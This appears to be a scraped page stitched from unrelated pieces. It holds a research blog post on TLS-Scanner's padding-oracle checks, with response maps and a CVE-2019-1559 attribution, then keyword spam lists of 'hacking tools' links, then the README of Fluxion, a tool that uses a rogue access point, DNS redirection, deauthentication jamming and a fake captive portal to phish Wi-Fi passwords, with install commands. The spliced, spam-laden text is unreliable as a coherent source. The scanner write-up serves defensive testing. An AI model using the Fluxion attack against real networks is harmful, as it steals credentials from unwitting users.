	TLS_DHE_RSA_WITH_AES_128_CBC_SHA - TLS12 - No Behavior Difference
	Response Map
	BasicMac-19-01 [BAD_RECORD_MAC] ENC X
	BasicMac-10-08 [BAD_RECORD_MAC] ENC X
	BasicMac-0-80 [BAD_RECORD_MAC] ENC X
	MissingMacByteFirst [BAD_RECORD_MAC] ENC X
	MissingMacByteLast [BAD_RECORD_MAC] ENC X
	Plain XF (0xXF=#padding bytes) [BAD_RECORD_MAC] ENC X
	Plain FF [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA - TLS12 - No Behavior Difference
	Response Map
	BasicMac-19-01 [BAD_RECORD_MAC] ENC X
	BasicMac-10-08 [BAD_RECORD_MAC] ENC X
	BasicMac-0-80 [BAD_RECORD_MAC] ENC X
	MissingMacByteFirst [BAD_RECORD_MAC] ENC X
	MissingMacByteLast [BAD_RECORD_MAC] ENC X
	Plain XF (0xXF=#padding bytes) [BAD_RECORD_MAC] ENC X
	Plain FF [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	TLS_RSA_WITH_AES_128_CBC_SHA256 - TLS12 - No Behavior Difference
	Response Map
	BasicMac-31-01 [BAD_RECORD_MAC] ENC X
	BasicMac-16-08 [BAD_RECORD_MAC] ENC X
	BasicMac-0-80 [BAD_RECORD_MAC] ENC X
	MissingMacByteFirst [BAD_RECORD_MAC] ENC X
	MissingMacByteLast [BAD_RECORD_MAC] ENC X
	Plain XF (0xXF=#padding bytes) [BAD_RECORD_MAC] ENC X
	Plain FF [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-0-47 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[23]-0-47 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-0-47 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-0-47 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-0-47 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-0-47 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-0-47 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[23]-0-47 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-0-47 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-41-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[3]-41-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-41-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-41-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-41-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-41-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-41-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[3]-41-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-41-6 [BAD_RECORD_MAC] ENC X
	TLS_RSA_WITH_AES_128_CBC_SHA - TLS12 - No Behavior Difference
	Response Map
	BasicMac-19-01 [BAD_RECORD_MAC] ENC X
	BasicMac-10-08 [BAD_RECORD_MAC] ENC X
	BasicMac-0-80 [BAD_RECORD_MAC] ENC X
	MissingMacByteFirst [BAD_RECORD_MAC] ENC X
	MissingMacByteLast [BAD_RECORD_MAC] ENC X
	Plain XF (0xXF=#padding bytes) [BAD_RECORD_MAC] ENC X
	Plain FF [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	TLS_RSA_WITH_CAMELLIA_128_CBC_SHA - TLS12 - No Behavior Difference
	Response Map
	BasicMac-19-01 [BAD_RECORD_MAC] ENC X
	BasicMac-10-08 [BAD_RECORD_MAC] ENC X
	BasicMac-0-80 [BAD_RECORD_MAC] ENC X
	MissingMacByteFirst [BAD_RECORD_MAC] ENC X
	MissingMacByteLast [BAD_RECORD_MAC] ENC X
	Plain XF (0xXF=#padding bytes) [BAD_RECORD_MAC] ENC X
	Plain FF [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-53-6 [BAD_RECORD_MAC] ENC X

view raw gistfile1.txt hosted with ❤ by GitHub

So what does this all mean? First of all, we named our malformed records. The interpretation of those names is visualized in the following table:

BasicMac-<position>-<XOR>	A Record with ApplicationData, MAC and padding bytes, where the padding byte at <position> is XOR'd <XOR>
MissingMacByteFirst	A Record without ApplicationData, where the first byte of the MAC is missing
MissingMacByteLast	A Record without ApplicationData, where the last byte of the MAC is missing
Plain FF	A Record without ApplicationData & MAC which only contains Paddingbytes: 64* 0xFF
Plain 3F	A Record without ApplicationData & MAC which only contains Paddingbytes: 64* 0xF3
InvPadValMac-[<position>]-<appDataLength>-<paddingBytes>	A Record with invalid padding and valid MAC. The Record contains <appDataLength> many ApplicationData bytes and <paddingBytes> many PaddingBytes. The Padding is invalid at <position>.
ValPadInvMac-[<position>]-<appDataLength>-<paddingBytes>	A Record with valid padding and invalid MAC. The Record contains <appDataLength> many ApplicationData bytes and <paddingBytes> many PaddingBytes. The MAC is invalid at <position>.
InvPadInvMac-[<position>]-<appDataLength>-<paddingBytes>	A Record with invalid padding and invalid MAC. The Record contains <appDataLength> many ApplicationData bytes and <paddingBytes> many PaddingBytes. The MAC is invalid at the first position. The Padding is invalid at <position>.

Next to the name you can see what the actual response from the server was. Alert messages which are in [] brackets indicate that the alert was a fatal alert while () brackets indicate a warning alert. ENC means that the messages were encrypted (which is not always the case). The last symbol in each line indicates the state of the socket. An X represents a closed socket with a TCP FIN, a T indicates that the socket was still open at the time of measurement and an @ indicates that the socket was closed with an RST. So how did Hackmanit respond? We see a [BAD_RECORD_MAC]  ENC X, which means we received an ENCrypted FATAL BAD_RECORD_MAC alert, and the TCP connection was closed with a TCP FIN. If a server appears to be vulnerable, the scanner will execute the scan a total of three times to confirm the vulnerability. Since this response is identical to all our vectors, we know that the server was not vulnerable and the scanner is not re-executing the workflows.

Here is an example of a vulnerable host:

	TLS_RSA_WITH_3DES_EDE_CBC_SHA - TLS12 - SOCKET_STATE VULNERABLE
	Response Map
	BasicMac-19-01 [BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	[BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	[BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	BasicMac-10-08 [BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	[BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	[BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	BasicMac-0-80 [BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	[BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	[BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	MissingMacByteFirst [BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	[BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	[BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	MissingMacByteLast [BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	[BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	[BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	Plain XF (0xXF=#padding bytes) [BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	[BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	[BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	Plain FF [BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	[BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	[BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	InvPadValMac-[0]-0-59 [BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	[BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	[BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	InvPadValMac-[29]-0-59 [BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	[BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	[BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	InvPadValMac-[last]-0-59 [BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	[BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	[BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	ValPadInvMac-[0]-0-59 [BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC T
	[BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC T
	[BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC T
	ValPadInvMac-[8]-0-59 [BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC T
	[BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC T
	[BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC T
	ValPadInvMac-[15]-0-59 [BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC T
	[BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC T
	[BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC T
	InvPadInvMac-[0]-0-59 [BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	[BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	[BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	InvPadInvMac-[29]-0-59 [BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	[BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	[BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	InvPadInvMac-[last]-0-59 [BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	[BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	[BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	InvPadValMac-[0]-53-6 [BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	[BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	[BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	InvPadValMac-[3]-53-6 [BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	[BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	[BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	InvPadValMac-[last]-53-6 [BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	[BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	[BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	ValPadInvMac-[0]-53-6 [BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	[BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	[BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	ValPadInvMac-[8]-53-6 [BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	[BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	[BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	ValPadInvMac-[15]-53-6 [BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	[BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	[BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	InvPadInvMac-[0]-53-6 [BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	[BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	[BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	InvPadInvMac-[3]-53-6 [BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	[BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	[BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	InvPadInvMac-[last]-53-6 [BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	[BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X
	[BAD_RECORD_MAC] (CLOSE_NOTIFY) ENC X

view raw gistfile1.txt hosted with ❤ by GitHub

As you can see, this time the workflows got executed multiple times, and the scanner reports the cipher suite and version as vulnerable because of "SOCKET_STATE". This means that in some cases the socket state revealed information about the plaintext. If you look closely, you can see that for ValPadInvMac-[0]-0-59, ValPadInvMac-[8]-0-59 and ValPadInvMac-[15]-0-59 the server failed to close the TCP socket, while for all other vectors the TCP connect was closed with a TCP FIN. The server was therefore vulnerable.

Since the server was vulnerable, TLS-Scanner will also print an additional section: "PaddingOracle Details"

In this section we try to identify the vulnerability. In the example above, TLS-Scanner will print the following:

	PaddingOracle Details
	Identification : Openssl CVE-2019-1559
	CVE : Openssl CVE-2019-1559
	Strength : STRONG
	Observable : true
	If an application encounters a fatal protocol error and then calls
	SSL_shutdown() twice (once to send a close_notify and once to receive one), then OpenSSL can respond differently to the calling application if a 0-byte record is received with invalid padding compared to if a 0-byte record is received with an invalid MAC. If the application then behaves differently based on that in a way that is detectable to the remote peer, then this amounts to a padding oracle that could be used to decrypt data.
	For this to be exploitable, "non-stitched" cipher suites must be in
	use. Stitched cipher suites are optimized implementations of specific commonly used cipher suites. Also, the application must call SSL_shutdown() twice even if a
	protocol error has occurred (applications should not do this, but some do
	anyway).
	This issue does not impact OpenSSL 1.1.1 or 1.1.0.
	OpenSSL 1.0.2 users should upgrade to 1.0.2r.
	--------------------------------------------------------
	Affected Products
	Openssl < 1.0.2r
	If your tested software/hardware is not in this list, please let us know so we can add it here.

view raw gistfile1.txt hosted with ❤ by GitHub

As you can see, we attribute this vulnerability to OpenSSL <1.0.2r. We do so by looking at the exact responses to our malformed records. We additionally print two important facts about the vulnerability: Whether it is observable and its strength. The precise details of these properties are beyond the scope of this blogpost, but the short version is:
If an oracle is observable, a man in the middle attacker can see the differences between the vectors by passively observing the traffic, without relying on browser or application specific tricks. A strong oracle has no limitations in the number of consecutive bytes an attacker can decrypt. If an oracle is STRONG and OBSERVABLE, then an attacker can realistically exploit it. This is the case in the example above.
For more details on this, you will have to wait for the paper.

Attribution

As you can see, we try to fingerprint the responsible device/implementation. However, we were not able to identify all vulnerable implementations yet. If we cannot attribute a vulnerability you will receive the following message:

Could not identify the vulnerability. Please contact us if you know which software/hardware is generating this behavior.

If you encounter this message, we do not know yet who is responsible for this padding oracle and would be happy to know which device/vendor is responsible. If you know who is, please contact us so that we can get in contact with the vendor to fix the issue. To reiterate, the tool never sends any data back to us, and it is your choice whether to contact us manually or not.

There are also some cases in which we can identify the vendor, but the vendor has not patched the vulnerability yet. If you encounter such a host, the scanner will tell you that we know the responsible vendor. To prevent abuse, we do not include further details.

Non-Determinism and Errors

In some cases, the scanner is unable to scan for padding oracles and reports ERROR or non-deterministic responses. The ERROR cases appear if the scanner failed could not handshake with the specified cipher suite and protocol version. This might be due to a bug in the tested TLS-Server or a bug in TLS-Attacker or TLS-Scanner. If you think the handshake fails because of an issue on our side, please open an issue on Github, and we will investigate. The more interesting cases are the non-deterministic ones. In such cases the scanner observed non-identical scan results in three separate scans. This can be due to non-determinism in the software, connection errors, server load or non-homogeneous load balancing. Currently, you will have to analyze these cases manually. In the paper, we excluded such hosts from our study because we did not want to artificially improve our results. But we understand that you as a tester want to know if the server is vulnerable or not. If the server is not truly vulnerable you would see the differences between the answers spread across all the different vectors. If the differences only appear on a subset of malformed records the server is very likely vulnerable. If you are unsure, you can also always scan multiple times (or scan slowly), increase the timeout, or if you are entirely lost get in touch with us. 

How YOU can help

Please use the scanner on all your hosts and check for padding oracle vulnerabilities. If the scanner can identify your vulnerability, a patch should already be available. Please patch your system! If the scanner does not identify the vulnerability (and instructs you to contact us), please contact us with the details (robert.merget@rub.de). If you can provide us with the detailed output of the scanner or even better, the name of the host, with the corresponding vendor, we could match the results with our database and help fix the issue. We can already attribute over 90% of the vulnerabilities, but there is still a lot to be discovered. We mostly scanned the Alexa top 1-million on port 443. Other protocols like IMAPS, POP3S, etc. might have different implementations with different vulnerabilities. If you find vulnerabilities with our tool, please give us credit. It helps us to get more funding for our project.

Issues with the Scanner

A notable feature of our scanner is that we do not actively try to avoid intolerances (like not scanning with a lot of cipher suites in the Hello messages etc.). We believe that doing so would hide important bugs. We are currently experimenting with intolerances checks, but the feature is now still in beta. If we cannot scan a server (most of the time due to intolerances or SNI problems), the scanner will report a lot of intolerances and usually no supported protocol versions. Some intolerances may trick the scanner into reporting false results. At the current stage, we cannot make any guarantees. If you are using this tool during a pentest, it might be smart to rescan with other scanners (like the recently released padcheck tool from our colleague Craig Young) to find the ground truth (this is good advice in general, since other mainstream scanners likely have the same issues). Note however that it is very unlikely that the scanner reports a false positive on a padding oracle scan.

Conclusion

There are still a lot of padding oracle vulnerabilities out there - and a lot of them are still unpatched. We hope you will find some bugs with the tool :) Happy H4cking :D

Acknowlegements

This is joint work from Robert Merget (@ic0nz1), Juraj Somorovsky (@jurajsomorovsky),  Nimrod Aviram (@NimrodAviram), Janis Fliegenschmidt (@JanisFliegens), Craig Young (@craigtweets), Jörg Schwenk (@JoergSchwenk) and (Yuval Shavitt).

Read more

• Hacks And Tools
• Hacker Tools Github
• Hacker Tools 2020
• Hack App
• Hacker Tools Linux
• Hacking Tools
• Hack Website Online Tool
• Hackrf Tools
• Black Hat Hacker Tools
• Hacking Tools 2019
• Hacking Tools Online
• Physical Pentest Tools
• Hacking App
• Hackrf Tools
• Best Pentesting Tools 2018
• Blackhat Hacker Tools
• Hacking Tools For Windows 7
• Hacker
• Pentest Tools Github
• Pentest Reporting Tools
• Hacking Tools Mac
• Nsa Hacker Tools
• Hacking Tools Pc
• Hacker Tools Software
• Beginner Hacker Tools
• Hacking Tools 2019
• Hacker Tools Linux

Fluxion - Set Up Fake AP, Fake DNS, And Create Captive Portal To Trick Users Into Giving You Their Password

Fluxion is a security auditing and social-engineering research tool. It is a remake of linset by vk496 with (hopefully) less bugs and more functionality. The script attempts to retrieve the WPA/WPA2 key from a target access point by means of a social engineering (phishing) attack. It's compatible with the latest release of Kali (rolling). Fluxion's attacks' setup is mostly manual, but experimental auto-mode handles some of the attacks' setup parameters. Read the FAQ before requesting issues.
If you need quick help, fluxion is also avaible on gitter. You can talk with us on Gitter or on Discord.

Installation
Read here before you do the following steps.
Download the latest revision

git clone --recursive git@github.com:FluxionNetwork/fluxion.git

Switch to tool's directory

cd fluxion 

Run fluxion (missing dependencies will be auto-installed)

./fluxion.sh

Fluxion is also available in arch

cd bin/arch
makepkg

or using the blackarch repo

pacman -S fluxion

Changelog
Fluxion gets weekly updates with new features, improvements, and bugfixes. Be sure to check out the changelog here.

How it works

• Scan for a target wireless network.
  
• Launch the Handshake Snooper attack.
  
• Capture a handshake (necessary for password verification).
  
• Launch Captive Portal attack.
  
• Spawns a rogue (fake) AP, imitating the original access point.
  
• Spawns a DNS server, redirecting all requests to the attacker's host running the captive portal.
  
• Spawns a web server, serving the captive portal which prompts users for their WPA/WPA2 key.
  
• Spawns a jammer, deauthenticating all clients from original AP and lureing them to the rogue AP.
  
• All authentication attempts at the captive portal are checked against the handshake file captured earlier.
  
• The attack will automatically terminate once a correct key has been submitted.
  
• The key will be logged and clients will be allowed to reconnect to the target access point.
  
• For a guide to the Captive Portal attack, read the Captive Portal attack guide
  

Requirements
A Linux-based operating system. We recommend Kali Linux 2 or Kali rolling. Kali 2 & rolling support the latest aircrack-ng versions. An external wifi card is recommended.

Related work
For development I use vim and tmux. Here are my dotfiles

Credits

1. l3op - contributor
2. dlinkproto - contributor
3. vk496 - developer of linset
4. Derv82 - @Wifite/2
5. Princeofguilty - @webpages and @buteforce
6. Photos for wiki @http://www.kalitutorials.net
7. Ons Ali @wallpaper
8. PappleTec @sites
9. MPX4132 - Fluxion V3

Disclaimer

• Authors do not own the logos under the /attacks/Captive Portal/sites/ directory. Copyright Disclaimer Under Section 107 of the Copyright Act 1976, allowance is made for "fair use" for purposes such as criticism, comment, news reporting, teaching, scholarship, and research.
  
• The usage of Fluxion for attacking infrastructures without prior mutual consent could be considered an illegal activity, and is highly discouraged by its authors/developers. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program.
  

Note

• Beware of sites pretending to be related with the Fluxion Project. These may be delivering malware.
  
• Fluxion DOES NOT WORK on Linux Subsystem For Windows 10, because the subsystem doesn't allow access to network interfaces. Any Issue regarding the same would be Closed Immediately
  

Links
Fluxion website: https://fluxionnetwork.github.io/fluxion/
Discord: https://discordapp.com/invite/G43gptk
Gitter: https://gitter.im/FluxionNetwork/Lobby

Download Fluxion

More info

1. Hacking Tools For Windows 7
2. Hack Website Online Tool
3. Install Pentest Tools Ubuntu
4. Pentest Tools Open Source
5. Hacker Security Tools
6. Nsa Hack Tools
7. Hacker Tools For Pc
8. How To Hack
9. Hacking Tools Mac
10. Hacker Tools List
11. Hackrf Tools
12. Hacking Tools For Windows Free Download
13. Hack Tools For Pc
14. Hacker Tool Kit
15. Tools 4 Hack
16. Hacking Tools Name
17. Pentest Tools Windows
18. Pentest Automation Tools
19. Underground Hacker Sites
20. Hacking Tools 2020
21. Termux Hacking Tools 2019
22. Hacking App